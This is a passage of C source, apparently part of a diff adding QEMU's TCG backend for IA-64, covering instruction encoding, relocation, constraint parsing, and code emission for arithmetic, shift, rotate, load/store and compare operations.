+ | ((len & 0x3f) << 27) + | ((pos & 0x3f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i14(int qp, uint64_t opc, int r1, uint64_t imm, + int r3, uint64_t pos, uint64_t len) +{ + return opc + | ((imm & 0x01) << 36) + | ((len & 0x3f) << 27) + | ((r3 & 0x7f) << 20) + | ((pos & 0x3f) << 14) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i15(int qp, uint64_t opc, int r1, int r2, + int r3, uint64_t pos, uint64_t len) +{ + return opc + | ((pos & 0x3f) << 31) + | ((len & 0x0f) << 27) + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i18(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* i */ + | ((imm & 0x0fffff) << 6) /* imm20a */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i21(int qp, uint64_t opc, int b1, + int r2, uint64_t imm) +{ + return opc + | ((imm & 0x1ff) << 24) + | ((r2 & 0x7f) << 13) + | ((b1 & 0x7) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i22(int qp, uint64_t opc, int r1, int b2) +{ + return opc + | ((b2 & 0x7) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i26(int qp, uint64_t opc, int ar3, int r2) +{ + return opc + | ((ar3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_i29(int qp, uint64_t opc, int r1, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_l2(uint64_t imm) +{ + return (imm & 0x7fffffffffc00000ull) >> 22; +} + +static inline uint64_t tcg_opc_l3(uint64_t imm) +{ + return (imm & 0x07fffffffff00000ull) >> 18; +} + +#define tcg_opc_l4 tcg_opc_l3 + +static inline uint64_t tcg_opc_m1(int qp, uint64_t opc, int r1, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m3(int qp, uint64_t opc, int r1, + int r3, uint64_t imm) +{ + return opc + | ((imm & 0x100) << 28) /* s */ + | ((imm & 0x080) << 20) /* i */ + | ((imm & 0x07f) << 13) /* imm7b */ + | ((r3 & 0x7f) << 20) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m4(int qp, uint64_t opc, int r2, int r3) +{ + return opc + | ((r3 & 0x7f) << 20) + | ((r2 & 0x7f) << 13) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m18(int qp, uint64_t opc, int f1, int r2) +{ + return opc + | ((r2 & 0x7f) << 13) + | ((f1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m19(int qp, uint64_t opc, int r1, int f2) +{ + return opc + | ((f2 & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m34(int qp, uint64_t opc, int r1, + int sof, int sol, int sor) +{ + return opc + | ((sor & 0x0f) << 27) + | ((sol & 0x7f) << 20) + | ((sof & 0x7f) << 13) + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_m48(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x100000) << 16) /* i */ + | ((imm & 0x0fffff) << 6) /* imm20a */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_x2(int qp, uint64_t opc, + int r1, uint64_t imm) +{ + return opc + | ((imm & 0x8000000000000000ull) >> 27) /* i */ + | (imm & 0x0000000000200000ull) /* ic */ + | ((imm & 0x00000000001f0000ull) << 6) /* imm5c */ + | ((imm & 0x000000000000ff80ull) << 20) /* imm9d */ + | ((imm & 0x000000000000007full) << 13) /* imm7b */ + | ((r1 & 0x7f) << 6) + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_x3(int qp, uint64_t opc, uint64_t imm) +{ + return opc + | ((imm & 0x0800000000000000ull) >> 23) /* i */ + | ((imm & 0x00000000000fffffull) << 13) /* imm20b */ + | (qp & 0x3f); +} + +static inline uint64_t tcg_opc_x4(int qp, uint64_t opc, int b1, uint64_t imm) +{ + return opc + | ((imm & 0x0800000000000000ull) >> 23) /* i */ + | ((imm & 0x00000000000fffffull) << 13) /* imm20b */ + | ((b1 & 0x7) << 6) + | (qp & 0x3f); +} + + +/* + * Relocations - Note that we never encode branches elsewhere than slot 2. + */ + +static void reloc_pcrel21b_slot2(tcg_insn_unit *pc, tcg_insn_unit *target) +{ + uint64_t imm = target - pc; + + pc->hi = (pc->hi & 0xf700000fffffffffull) + | ((imm & 0x100000) << 39) /* s */ + | ((imm & 0x0fffff) << 36); /* imm20b */ +} + +static uint64_t get_reloc_pcrel21b_slot2(tcg_insn_unit *pc) +{ + int64_t high = pc->hi; + + return ((high >> 39) & 0x100000) + /* s */ + ((high >> 36) & 0x0fffff); /* imm20b */ +} + +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + assert(addend == 0); + assert(type == R_IA64_PCREL21B); + reloc_pcrel21b_slot2(code_ptr, (tcg_insn_unit *)value); +} + +/* + * Constraints + */ + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str) +{ + const char *ct_str; + + ct_str = *pct_str; + switch(ct_str[0]) { + case 'r': + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffffffffffffull); + break; + case 'I': + ct->ct |= TCG_CT_CONST_S22; + break; + case 'S': + ct->ct |= TCG_CT_REG; + tcg_regset_set(ct->u.regs, 0xffffffffffffffffull); +#if defined(CONFIG_SOFTMMU) + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R56); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R57); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_R58); +#endif + break; + case 'Z': + /* We are cheating a bit here, using the fact that the register + r0 is also the register number 0. Hence there is no need + to check for const_args in each instruction. */ + ct->ct |= TCG_CT_CONST_ZERO; + break; + default: + return -1; + } + ct_str++; + *pct_str = ct_str; + return 0; +} + +/* test if a constant matches the constraint */ +static inline int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct; + ct = arg_ct->ct; + if (ct & TCG_CT_CONST) + return 1; + else if ((ct & TCG_CT_CONST_ZERO) && val == 0) + return 1; + else if ((ct & TCG_CT_CONST_S22) && val == ((int32_t)val << 10) >> 10) + return 1; + else + return 0; +} + +/* + * Code generation + */ + +static tcg_insn_unit *tb_ret_addr; + +static inline void tcg_out_bundle(TCGContext *s, int template, + uint64_t slot0, uint64_t slot1, + uint64_t slot2) +{ + template &= 0x1f; /* 5 bits */ + slot0 &= 0x1ffffffffffull; /* 41 bits */ + slot1 &= 0x1ffffffffffull; /* 41 bits */ + slot2 &= 0x1ffffffffffull; /* 41 bits */ + + *s->code_ptr++ = (tcg_insn_unit){ + (slot1 << 46) | (slot0 << 5) | template, + (slot2 << 23) | (slot1 >> 18) + }; +} + +static inline uint64_t tcg_opc_mov_a(int qp, TCGReg dst, TCGReg src) +{ + return tcg_opc_a4(qp, OPC_ADDS_A4, dst, 0, src); +} + +static inline void tcg_out_mov(TCGContext *s, TCGType type, + TCGReg ret, TCGReg arg) +{ + tcg_out_bundle(s, mmI, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_mov_a(TCG_REG_P0, ret, arg)); +} + +static inline uint64_t tcg_opc_movi_a(int qp, TCGReg dst, int64_t src) +{ + assert(src == sextract64(src, 0, 22)); + return tcg_opc_a5(qp, OPC_ADDL_A5, dst, src, TCG_REG_R0); +} + +static inline void tcg_out_movi(TCGContext *s, TCGType type, + TCGReg reg, tcg_target_long arg) +{ + tcg_out_bundle(s, mLX, + INSN_NOP_M, + tcg_opc_l2 (arg), + tcg_opc_x2 (TCG_REG_P0, OPC_MOVL_X2, reg, arg)); +} + +static void tcg_out_br(TCGContext *s, int label_index) +{ + TCGLabel *l = &s->labels[label_index]; + uint64_t imm; + + /* We pay attention here to not modify the branch target by reading + the existing value and using it again. This ensure that caches and + memory are kept coherent during retranslation. */ + if (l->has_value) { + imm = l->u.value_ptr - s->code_ptr; + } else { + imm = get_reloc_pcrel21b_slot2(s->code_ptr); + tcg_out_reloc(s, s->code_ptr, R_IA64_PCREL21B, label_index, 0); + } + + tcg_out_bundle(s, mmB, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_b1(TCG_REG_P0, OPC_BR_SPTK_MANY_B1, imm)); +} + +static inline void tcg_out_call(TCGContext *s, tcg_insn_unit *desc) +{ + uintptr_t func = desc->lo, gp = desc->hi, disp; + + /* Look through the function descriptor. */ + tcg_out_bundle(s, mlx, + INSN_NOP_M, + tcg_opc_l2 (gp), + tcg_opc_x2 (TCG_REG_P0, OPC_MOVL_X2, TCG_REG_R1, gp)); + disp = (tcg_insn_unit *)func - s->code_ptr; + tcg_out_bundle(s, mLX, + INSN_NOP_M, + tcg_opc_l4 (disp), + tcg_opc_x4 (TCG_REG_P0, OPC_BRL_CALL_SPTK_MANY_X4, + TCG_REG_B0, disp)); +} + +static void tcg_out_exit_tb(TCGContext *s, tcg_target_long arg) +{ + uint64_t imm, opc1; + + /* At least arg == 0 is a common operation. */ + if (arg == sextract64(arg, 0, 22)) { + opc1 = tcg_opc_movi_a(TCG_REG_P0, TCG_REG_R8, arg); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R8, arg); + opc1 = INSN_NOP_M; + } + + imm = tb_ret_addr - s->code_ptr; + + tcg_out_bundle(s, mLX, + opc1, + tcg_opc_l3 (imm), + tcg_opc_x3 (TCG_REG_P0, OPC_BRL_SPTK_MANY_X3, imm)); +} + +static inline void tcg_out_goto_tb(TCGContext *s, TCGArg arg) +{ + if (s->tb_jmp_offset) { + /* direct jump method */ + tcg_abort(); + } else { + /* indirect jump method */ + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, + (tcg_target_long)(s->tb_next + arg)); + tcg_out_bundle(s, MmI, + tcg_opc_m1 (TCG_REG_P0, OPC_LD8_M1, + TCG_REG_R2, TCG_REG_R2), + INSN_NOP_M, + tcg_opc_i21(TCG_REG_P0, OPC_MOV_I21, TCG_REG_B6, + TCG_REG_R2, 0)); + tcg_out_bundle(s, mmB, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_b4 (TCG_REG_P0, OPC_BR_SPTK_MANY_B4, + TCG_REG_B6)); + } + s->tb_next_offset[arg] = tcg_current_code_size(s); +} + +static inline void tcg_out_jmp(TCGContext *s, TCGArg addr) +{ + tcg_out_bundle(s, mmI, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_i21(TCG_REG_P0, OPC_MOV_I21, TCG_REG_B6, addr, 0)); + tcg_out_bundle(s, mmB, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_b4(TCG_REG_P0, OPC_BR_SPTK_MANY_B4, TCG_REG_B6)); +} + +static inline void tcg_out_ld_rel(TCGContext *s, uint64_t opc_m4, TCGArg arg, + TCGArg arg1, tcg_target_long arg2) +{ + if (arg2 == ((int16_t)arg2 >> 2) << 2) { + tcg_out_bundle(s, MmI, + tcg_opc_a4(TCG_REG_P0, OPC_ADDS_A4, + TCG_REG_R2, arg2, arg1), + tcg_opc_m1 (TCG_REG_P0, opc_m4, arg, TCG_REG_R2), + INSN_NOP_I); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, arg2); + tcg_out_bundle(s, MmI, + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, + TCG_REG_R2, TCG_REG_R2, arg1), + tcg_opc_m1 (TCG_REG_P0, opc_m4, arg, TCG_REG_R2), + INSN_NOP_I); + } +} + +static inline void tcg_out_st_rel(TCGContext *s, uint64_t opc_m4, TCGArg arg, + TCGArg arg1, tcg_target_long arg2) +{ + if (arg2 == ((int16_t)arg2 >> 2) << 2) { + tcg_out_bundle(s, MmI, + tcg_opc_a4(TCG_REG_P0, OPC_ADDS_A4, + TCG_REG_R2, arg2, arg1), + tcg_opc_m4 (TCG_REG_P0, opc_m4, arg, TCG_REG_R2), + INSN_NOP_I); + } else { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, arg2); + tcg_out_bundle(s, MmI, + tcg_opc_a1 (TCG_REG_P0, OPC_ADD_A1, + TCG_REG_R2, TCG_REG_R2, arg1), + tcg_opc_m4 (TCG_REG_P0, opc_m4, arg, TCG_REG_R2), + INSN_NOP_I); + } +} + +static inline void tcg_out_ld(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + if (type == TCG_TYPE_I32) { + tcg_out_ld_rel(s, OPC_LD4_M1, arg, arg1, arg2); + } else { + tcg_out_ld_rel(s, OPC_LD8_M1, arg, arg1, arg2); + } +} + +static inline void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, + TCGReg arg1, intptr_t arg2) +{ + if (type == TCG_TYPE_I32) { + tcg_out_st_rel(s, OPC_ST4_M4, arg, arg1, arg2); + } else { + tcg_out_st_rel(s, OPC_ST8_M4, arg, arg1, arg2); + } +} + +static inline void tcg_out_alu(TCGContext *s, uint64_t opc_a1, uint64_t opc_a3, + TCGReg ret, TCGArg arg1, int const_arg1, + TCGArg arg2, int const_arg2) +{ + uint64_t opc1 = 0, opc2 = 0, opc3 = 0; + + if (const_arg2 && arg2 != 0) { + opc2 = tcg_opc_movi_a(TCG_REG_P0, TCG_REG_R3, arg2); + arg2 = TCG_REG_R3; + } + if (const_arg1 && arg1 != 0) { + if (opc_a3 && arg1 == (int8_t)arg1) { + opc3 = tcg_opc_a3(TCG_REG_P0, opc_a3, ret, arg1, arg2); + } else { + opc1 = tcg_opc_movi_a(TCG_REG_P0, TCG_REG_R2, arg1); + arg1 = TCG_REG_R2; + } + } + if (opc3 == 0) { + opc3 = tcg_opc_a1(TCG_REG_P0, opc_a1, ret, arg1, arg2); + } + + tcg_out_bundle(s, (opc1 || opc2 ? mII : miI), + opc1 ? opc1 : INSN_NOP_M, + opc2 ? opc2 : INSN_NOP_I, + opc3); +} + +static inline void tcg_out_add(TCGContext *s, TCGReg ret, TCGReg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2 && arg2 == sextract64(arg2, 0, 14)) { + tcg_out_bundle(s, mmI, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_a4(TCG_REG_P0, OPC_ADDS_A4, ret, arg2, arg1)); + } else { + tcg_out_alu(s, OPC_ADD_A1, 0, ret, arg1, 0, arg2, const_arg2); + } +} + +static inline void tcg_out_sub(TCGContext *s, TCGReg ret, TCGArg arg1, + int const_arg1, TCGArg arg2, int const_arg2) +{ + if (!const_arg1 && const_arg2 && -arg2 == sextract64(-arg2, 0, 14)) { + tcg_out_bundle(s, mmI, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_a4(TCG_REG_P0, OPC_ADDS_A4, ret, -arg2, arg1)); + } else { + tcg_out_alu(s, OPC_SUB_A1, OPC_SUB_A3, ret, + arg1, const_arg1, arg2, const_arg2); + } +} + +static inline void tcg_out_eqv(TCGContext *s, TCGArg ret, + TCGArg arg1, int const_arg1, + TCGArg arg2, int const_arg2) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a1 (TCG_REG_P0, OPC_XOR_A1, ret, arg1, arg2), + tcg_opc_a3 (TCG_REG_P0, OPC_ANDCM_A3, ret, -1, ret)); +} + +static inline void tcg_out_nand(TCGContext *s, TCGArg ret, + TCGArg arg1, int const_arg1, + TCGArg arg2, int const_arg2) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a1 (TCG_REG_P0, OPC_AND_A1, ret, arg1, arg2), + tcg_opc_a3 (TCG_REG_P0, OPC_ANDCM_A3, ret, -1, ret)); +} + +static inline void tcg_out_nor(TCGContext *s, TCGArg ret, + TCGArg arg1, int const_arg1, + TCGArg arg2, int const_arg2) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a1 (TCG_REG_P0, OPC_OR_A1, ret, arg1, arg2), + tcg_opc_a3 (TCG_REG_P0, OPC_ANDCM_A3, ret, -1, ret)); +} + +static inline void tcg_out_orc(TCGContext *s, TCGArg ret, + TCGArg arg1, int const_arg1, + TCGArg arg2, int const_arg2) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a3 (TCG_REG_P0, OPC_ANDCM_A3, TCG_REG_R2, -1, arg2), + tcg_opc_a1 (TCG_REG_P0, OPC_OR_A1, ret, arg1, TCG_REG_R2)); +} + +static inline void tcg_out_mul(TCGContext *s, TCGArg ret, + TCGArg arg1, TCGArg arg2) +{ + tcg_out_bundle(s, mmI, + tcg_opc_m18(TCG_REG_P0, OPC_SETF_SIG_M18, TCG_REG_F6, arg1), + tcg_opc_m18(TCG_REG_P0, OPC_SETF_SIG_M18, TCG_REG_F7, arg2), + INSN_NOP_I); + tcg_out_bundle(s, mmF, + INSN_NOP_M, + INSN_NOP_M, + tcg_opc_f2 (TCG_REG_P0, OPC_XMA_L_F2, TCG_REG_F6, TCG_REG_F6, + TCG_REG_F7, TCG_REG_F0)); + tcg_out_bundle(s, miI, + tcg_opc_m19(TCG_REG_P0, OPC_GETF_SIG_M19, ret, TCG_REG_F6), + INSN_NOP_I, + INSN_NOP_I); +} + +static inline void tcg_out_sar_i32(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_I11, + ret, arg1, arg2, 31 - arg2)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_a3 (TCG_REG_P0, OPC_AND_A3, + TCG_REG_R3, 0x1f, arg2), + tcg_opc_i29(TCG_REG_P0, OPC_SXT4_I29, TCG_REG_R2, arg1), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_I5, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static inline void tcg_out_sar_i64(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_I11, + ret, arg1, arg2, 63 - arg2)); + } else { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_I5, ret, arg1, arg2)); + } +} + +static inline void tcg_out_shl_i32(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, ret, + arg1, 63 - arg2, 31 - arg2)); + } else { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a3 (TCG_REG_P0, OPC_AND_A3, TCG_REG_R2, + 0x1f, arg2), + tcg_opc_i7 (TCG_REG_P0, OPC_SHL_I7, ret, + arg1, TCG_REG_R2)); + } +} + +static inline void tcg_out_shl_i64(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, ret, + arg1, 63 - arg2, 63 - arg2)); + } else { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i7 (TCG_REG_P0, OPC_SHL_I7, ret, + arg1, arg2)); + } +} + +static inline void tcg_out_shr_i32(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, ret, + arg1, arg2, 31 - arg2)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_a3 (TCG_REG_P0, OPC_AND_A3, TCG_REG_R3, + 0x1f, arg2), + tcg_opc_i29(TCG_REG_P0, OPC_ZXT4_I29, TCG_REG_R2, arg1), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static inline void tcg_out_shr_i64(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, ret, + arg1, arg2, 63 - arg2)); + } else { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, ret, + arg1, arg2)); + } +} + +static inline void tcg_out_rotl_i32(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i2 (TCG_REG_P0, OPC_UNPACK4_L_I2, + TCG_REG_R2, arg1, arg1), + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, ret, + TCG_REG_R2, 32 - arg2, 31)); + } else { + tcg_out_bundle(s, miI, + INSN_NOP_M, + tcg_opc_i2 (TCG_REG_P0, OPC_UNPACK4_L_I2, + TCG_REG_R2, arg1, arg1), + tcg_opc_a3 (TCG_REG_P0, OPC_AND_A3, TCG_REG_R3, + 0x1f, arg2)); + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_a3 (TCG_REG_P0, OPC_SUB_A3, TCG_REG_R3, + 0x20, TCG_REG_R3), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static inline void tcg_out_rotl_i64(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i10(TCG_REG_P0, OPC_SHRP_I10, ret, arg1, + arg1, 0x40 - arg2)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_a3 (TCG_REG_P0, OPC_SUB_A3, TCG_REG_R2, + 0x40, arg2), + tcg_opc_i7 (TCG_REG_P0, OPC_SHL_I7, TCG_REG_R3, + arg1, arg2), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, TCG_REG_R2, + arg1, TCG_REG_R2)); + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_a1 (TCG_REG_P0, OPC_OR_A1, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static inline void tcg_out_rotr_i32(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i2 (TCG_REG_P0, OPC_UNPACK4_L_I2, + TCG_REG_R2, arg1, arg1), + tcg_opc_i11(TCG_REG_P0, OPC_EXTR_U_I11, ret, + TCG_REG_R2, arg2, 31)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_a3 (TCG_REG_P0, OPC_AND_A3, TCG_REG_R3, + 0x1f, arg2), + tcg_opc_i2 (TCG_REG_P0, OPC_UNPACK4_L_I2, + TCG_REG_R2, arg1, arg1), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static inline void tcg_out_rotr_i64(TCGContext *s, TCGArg ret, TCGArg arg1, + TCGArg arg2, int const_arg2) +{ + if (const_arg2) { + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i10(TCG_REG_P0, OPC_SHRP_I10, ret, arg1, + arg1, arg2)); + } else { + tcg_out_bundle(s, mII, + tcg_opc_a3 (TCG_REG_P0, OPC_SUB_A3, TCG_REG_R2, + 0x40, arg2), + tcg_opc_i5 (TCG_REG_P0, OPC_SHR_U_I5, TCG_REG_R3, + arg1, arg2), + tcg_opc_i7 (TCG_REG_P0, OPC_SHL_I7, TCG_REG_R2, + arg1, TCG_REG_R2)); + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_a1 (TCG_REG_P0, OPC_OR_A1, ret, + TCG_REG_R2, TCG_REG_R3)); + } +} + +static const uint64_t opc_ext_i29[8] = { + OPC_ZXT1_I29, OPC_ZXT2_I29, OPC_ZXT4_I29, 0, + OPC_SXT1_I29, OPC_SXT2_I29, OPC_SXT4_I29, 0 +}; + +static inline uint64_t tcg_opc_ext_i(int qp, TCGMemOp opc, TCGReg d, TCGReg s) +{ + if ((opc & MO_SIZE) == MO_64) { + return tcg_opc_mov_a(qp, d, s); + } else { + return tcg_opc_i29(qp, opc_ext_i29[opc & MO_SSIZE], d, s); + } +} + +static inline void tcg_out_ext(TCGContext *s, uint64_t opc_i29, + TCGArg ret, TCGArg arg) +{ + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_i29(TCG_REG_P0, opc_i29, ret, arg)); +} + +static inline uint64_t tcg_opc_bswap64_i(int qp, TCGReg d, TCGReg s) +{ + return tcg_opc_i3(qp, OPC_MUX1_I3, d, s, 0xb); +} + +static inline void tcg_out_bswap16(TCGContext *s, TCGArg ret, TCGArg arg) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, ret, arg, 15, 15), + tcg_opc_bswap64_i(TCG_REG_P0, ret, ret)); +} + +static inline void tcg_out_bswap32(TCGContext *s, TCGArg ret, TCGArg arg) +{ + tcg_out_bundle(s, mII, + INSN_NOP_M, + tcg_opc_i12(TCG_REG_P0, OPC_DEP_Z_I12, ret, arg, 31, 31), + tcg_opc_bswap64_i(TCG_REG_P0, ret, ret)); +} + +static inline void tcg_out_bswap64(TCGContext *s, TCGArg ret, TCGArg arg) +{ + tcg_out_bundle(s, miI, + INSN_NOP_M, + INSN_NOP_I, + tcg_opc_bswap64_i(TCG_REG_P0, ret, arg)); +} + +static inline void tcg_out_deposit(TCGContext *s, TCGArg ret, TCGArg a1, + TCGArg a2, int const_a2, int pos, int len) +{ + uint64_t i1 = 0, i2 = 0; + int cpos = 63 - pos, lm1 = len - 1; + + if (const_a2) { + /* Truncate the value of a constant a2 to the width of the field. */ + int mask = (1u << len) - 1; + a2 &= mask; + + if (a2 == 0 || a2 == mask) { + /* 1-bit signed constant inserted into register. */ + i2 = tcg_opc_i14(TCG_REG_P0, OPC_DEP_I14, ret, a2, a1, cpos, lm1); + } else { + /* Otherwise, load any constant into a temporary. Do this into + the first I slot to help out with cross-unit delays. */ + i1 = tcg_opc_movi_a(TCG_REG_P0, TCG_REG_R2, a2); + a2 = TCG_REG_R2; + } + } + if (i2 == 0) { + i2 = tcg_opc_i15(TCG_REG_P0, OPC_DEP_I15, ret, a2, a1, cpos, lm1); + } + tcg_out_bundle(s, (i1 ? mII : miI), + INSN_NOP_M, + i1 ? i1 : INSN_NOP_I, + i2); +} + +static inline uint64_t tcg_opc_cmp_a(int qp, TCGCond cond, TCGArg arg1, + TCGArg arg2, int cmp4) +{ + uint64_t opc_eq_a6, opc_lt_a6, opc_ltu_a6; + + if (cmp4) { + opc_eq_a6 = OPC_CMP4_EQ_A6; + opc_lt_a6 = OPC_CMP4_LT_A6; + opc_ltu_a6 = OPC_CMP4_LTU_A6; + } else { + opc_eq_a6 = OPC_CMP_EQ_A6; + opc_lt_a6 = OPC_CMP_LT_A6; + opc_ltu_a6 = OPC_CMP_LTU_A6; + } + + switch (cond) { + case TCG_COND_EQ: + return tcg_opc_a6 (qp, opc_eq_a6, TCG_REG_P6, TCG_REG_P7, arg1, arg2); + case TCG_COND_NE: + return tcg_opc_a6 (qp, opc_eq_a6, TCG_REG_P7, TCG_REG_P6, arg1, arg2); + case TCG_COND_LT: + return tcg_opc_a6 (qp, opc_lt_a6, TCG_REG_P6, TCG_REG_P7, arg1, arg2); + case TCG_COND_LTU: + return tcg_opc_a6 (qp, opc_ltu_a6, TCG_REG_P6, TCG_REG_P7, arg1, arg2); + case TCG_COND_GE: + return tcg_opc_a6 (qp, opc_lt_a6, TCG_REG_P7, TCG_REG_P6, arg1, arg2); + case TCG_COND_GEU: + return tcg_opc_a6 (qp, opc_ltu_a6, TCG_REG_P7, TCG_REG_P6, arg1, arg2); + case TCG_COND_LE: + return tcg_opc_a6 (qp, opc_lt_a6, TCG_REG_P7, TCG_REG_P6, arg2, arg1); + case TCG_COND_LEU: + return tcg_opc_a6 (qp, opc_ltu_a6, TCG_REG_P7, TCG_REG_P6, arg2, arg1); + case TCG_COND_GT: + return tcg_opc_a6 (qp, opc_lt_a6, TCG_REG_P6, TCG_REG_P7, arg2, arg1); + case TCG_COND_GTU: + return tcg_opc_a6 (qp, opc_ltu_a6, TCG_REG_P6, TCG_REG_P7, arg2, arg1); + default: + tcg_abort(); + break; + } +} + +static inline void tcg_out_brcond(TCGContext *s, TCGCond cond, TCGReg arg1, + TCGReg arg2, int label_index, int cmp4) +{ + TCGLabel *l = &s->labels[label_index]; + uint64_t imm; + + /* We pay 